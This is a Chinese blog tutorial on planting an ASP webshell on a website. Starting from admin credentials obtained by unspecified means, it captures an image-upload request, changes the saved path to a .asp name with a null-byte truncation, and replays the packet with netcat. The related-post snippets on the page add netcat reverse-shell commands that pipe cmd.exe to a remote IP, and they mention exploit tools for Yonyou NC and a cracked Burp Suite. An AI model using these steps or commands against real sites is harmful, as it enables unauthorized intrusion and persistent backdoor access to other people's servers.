nc抓包改包上传

最新推荐文章于 2022-12-28 17:29:11 发布
最新推荐文章于 2022-12-28 17:29:11 发布
阅读量1.4k 收藏 1
点赞数

通过各种方法获得网站的管理员帐号和密码

找到网站的后台登录地址

用获得的帐号、密码登录网站后台

登录后悲剧的发现,网站只允许上传的文件格式为jpggif等,不允许上传asp格式的文件,所以可以尝试着通过nc抓包改包拿shell

找到上传图片的位置

asp格式的小马改成jpg格式

点击浏览,选择要上传的xiao.jpg文件,但不要点击选择文件对话框的打开按钮,为什么网上都说先不要点呢,这个当然是有原因的啦,前人的经验啊!因为浏览器进程太多的话就不找到该抓哪一个包了

打开抓包工具,选择要监视的进程“选择文件”,然后点击打开按钮

点击打开选择文件对话框的打开对话框,然后点击浏览按钮旁边的上传按钮,然后就可以开始监视了

10 上传成功后,切换到网络抓包工具的窗口查看捕捉到的数据包

11 复制第34行的数据到一个txt文件中保存

12 3行的数据包是包头、第4行的数据包是包的内容,即发送的数据包内容,得到数据包如下,这样的数据包才有希望,因为出现了filepath,即上传到网站的文件的保存路径。如果没有出现filepath类似的文件保存路径,可以尝试着换一个图片上传的位置。

13 开始改包,改包分为三步

(1)修改文件路径

下面是改前

下面是改后(特别注意x.asp 文件名x.asp后面一定要加一个空格)

(2)修改数据大小,讲jpg格式的小马还原成asp格式

下面是数据大小改前

下面是数据修改后(x.asp加上一个空格,所以长度增加了6

(3)通过Ultraedit在16进制模式下修改x.asp后面的空格对应的十六进制20改为00

下面是改前

下面是改后

14 将修改后的数据与nc放同一目录,运行cmd,切换到nc所在的目录

15 开始执行命令nc www.xxx.com 80<1.txt,向网站发送数据包

16 出现乱码也没关系,在浏览器中输入上传文件的保存地址看是否上传成功,即在浏览器中输入www.xxx.com/uploadfile/Product_small/x.asp,能成功打开网页,说明上传asp小马成功,则成功拿到该网站的shell

17 同理,也可以按照相同的方法向网站传txt文件,注意的是改包时修改文件路径为1.txt 文件名后也需要有一个空格,其余位置不变,最后在浏览器中输入文件保存地址,看是否上传成功

 

 

 

朝向高处的旅途
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nc传shell抓包-nc连接获取shell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-14 941
nc传shell步骤1、渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量:客户端:nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端:nc -lvvp 4444 #监听4444端口2、nc传shell抓包nc反向连接,防火墙阻挡外部流量: 服务端:nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略
Burpsuite+1.7.26+Unlimited抓包改包发包工具
07-16
如果运行不了,那么在命令行下允许 C:\Users\Administrator.USER-20180620GL> cd /D D:\soft\Burpsuite+1.7.26+Unlimited D:\soft\Burpsuite+1.7.26+Unlimited> java -jar BurpUnlimited.jar 一.设置代理:https://wenda.so.com/q/1370918176064761?src=140 首先在 IE选项--连接 页面中间选“从不进行拨号连接”,然后在 IE选项--连接--局域网设置里在“为LAN使用代理服务器”前的方框打勾,设置代理IP,端口 二.burp suite使用(一) --- 抓包,截包,改包 https://blog.csdn.net/jinzhichaoshuiping/article/details/47324955 1.设置浏览器-代理 127.0.0.1 8080 2.配置burp监听端口,打开burp-》Proxy-》options-》add 三.burp suite使用(二) --- 爆破 https://blog.csdn.net/jinzhichaoshuiping/article/details/47347243 send to intruder 点击positions,选择要爆破的密码所处位置,默认的选择是出现的所有数字,被用黄色标出。 点击右边的clear$,所有的标记 选择错误密码所在的位置,点击add$,于是密码所在的位置被标记。
NC抓包改包上传拿shell
系统运维
04-08 473
1通过各种方法获得网站的管理员帐号和密码 2找到网站的后台登录地址 3用获得的帐号、密码登录网站后台 4登录后悲剧的发现,网站只允许上传的文件格式为jpg、gif等,不允许上传asp格式的文件,所以可以尝试着通过nc抓包改包拿shell 5找到上传图片的位置 6讲asp格式的小马改成jpg格式 7点击浏览,选择要上传的xiao.jpg文件,但不要点击选择文件对话框的打开按钮,为...
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 7459
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
傻瓜式改包工具
chiwu2008的博客
07-25 2461
修改APP的名字、图标太容易了,傻瓜式!apktool反编译!
NC57安全补丁集合包
06-08
NC57安全补丁集合
netcdf_tools_matlab读nc文件的工具包_
10-03
在matlab中用于读取nc文件,将数据文件和工具包放于同级文件夹中即可
centos7.9 nc rpm包及依赖
07-01
nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的...
nc工具包x86
05-23
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
常见工具 nc Wireshark反弹shell
代码审计
04-20 1095
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
Charles拦截抓包,修改包里面内容
沉下心,苦磨炼
12-29 3102
Charles的工作原理 1.由客户端发送请求 2.Charles接收再发送给服务端 3.服务端返回请求结果给Charles 4.由Charles转发给客户端 Charles的下载安装 1.访问官网https://www.charlesproxy.com/latest-release/download.do 找到自己对应的操作系统的版本,然后下载。下载完毕后进行安装,点击"下一步"即可安装完成。 Charles代理设置 1.修改代理端口Proxy-->Proxy Setting.
使用NC模拟HTTP请求
tcliuwenwen的博客
04-22 4041
博文背景 很多人使用telnet来模拟HTTP请求,我总觉得它不应该这么用,而是用NC更具有正规血统,可以帮助我们从本质上理解HTTP数据包 ubuntu@guangdong:~ $ nc httpbin.org 80 GET /get HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 22 Apr 2020 11:03:46 GMT Content-Type: appli...
Fiddler三种方式改包
安卓世界库
09-28 1667
2.URLWithBody 这里要匹配两个url和body,所以一般都是用例匹配POST请求,比如 URLWithBody:baidu name,当遇到url中包含baidu,且body中有name的,就会自动返回设定的值。1.匹配链接,我们拖进去会显示为EXACT:xxx,我们可以改为要匹配的链接的子字符串,如baidu,当有链接包含baidu就会自动返回设定的值。按照上面的步骤,把这个请求拖到AutoResponder,选择find a file,选择刚才的entire,
linux nc 抓包,抓包NC上传原理
weixin_39642990的博客
05-17 589
发现有上传漏洞,跟前些日子的6KBBS的上传漏洞一样,都是filepath变量的问题,如图(三)下面进行上传ASP木马,选择好要上传的ASP木马,但不要点上传按钮,如图(四).然后进行WSockExper抓包,如图(五)回到IE中来上传文件,点“上传”按钮后,提示出错,说文件上传发生错误,文件格式不正确,这个是预料之中的(能直接上传成功才怪呢).回到抓包软件中来看看抓包结果吧,WSockExper...
fiddle截包和改包
test_leader的博客
03-24 1152
截包: 一、截断请求数据包:即fiddler工具截获页面的请求数据包,使其发送不到服务器端,只到fiddler工具这一层就结束 二、截断返回的数据包:即fiddler拿到服务器端返回的数据包,但不返回给前端页面,则请求方处于等待服务器端返回数据包的状态。这个可以用来模拟“等待服务器端返回数据包”和“服务器端返回数据包超时”,以测试前端页面如何处理。 改包改包的前提是截包 一、修改请求数据包,再提交带服务器端,检查服务器端的处理情况 步骤: 请求头内容:headers右键进行修改 .
easyupload及BurpSuite抓包改包、放包
Welcome To Myon'Blog !
12-28 3764
easyupload 文件上传题 用BurpSuite进行简单的抓包改包、放包 一句话木马 绕过 getshell
Wireshark修改数据包
热门推荐
JacobTsang的博客
11-08 2万+
新版本不行。 旧版本可以:https://www.wireshark.org/download/win64/all-versions/Wireshark-win64-1.12.8.exe
Fiddler改包
神秘的凯
09-24 2969
都知道抓包改包神器BurpSuite,对于我们想知道一些网站的登陆参数的时候,经常需要通过代理来拦截HTTP、HTTPS请求,但是当我们遇到手机APP的时候就突然懵逼了。本文介绍了Fiddler如何实现BurpSuite的功能,并轻松的抓到手机中各大厂家的APP的流量,发现很多厂家对手机APP安全非常重视。最后介绍,通过Fiddler对静默的手机进行进行抓包,轻松判断手机是否中毒。 0x1、使用Fiddler抓取网站流量 步骤一:登陆官网下载并安装Fiddler(https://www.telerik.
bp抓包乱码怎么解决
最新发布
09-13
要解决Burp Suite抓包出现乱码的问题,可以按照以下步骤进行操作: 1. 首先,检查是否安装了Burp的受信任证书。在浏览器中访问http://burp并下载CA证书进行安装。以Firefox浏览器为例,导入完证书后,需要在浏览器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值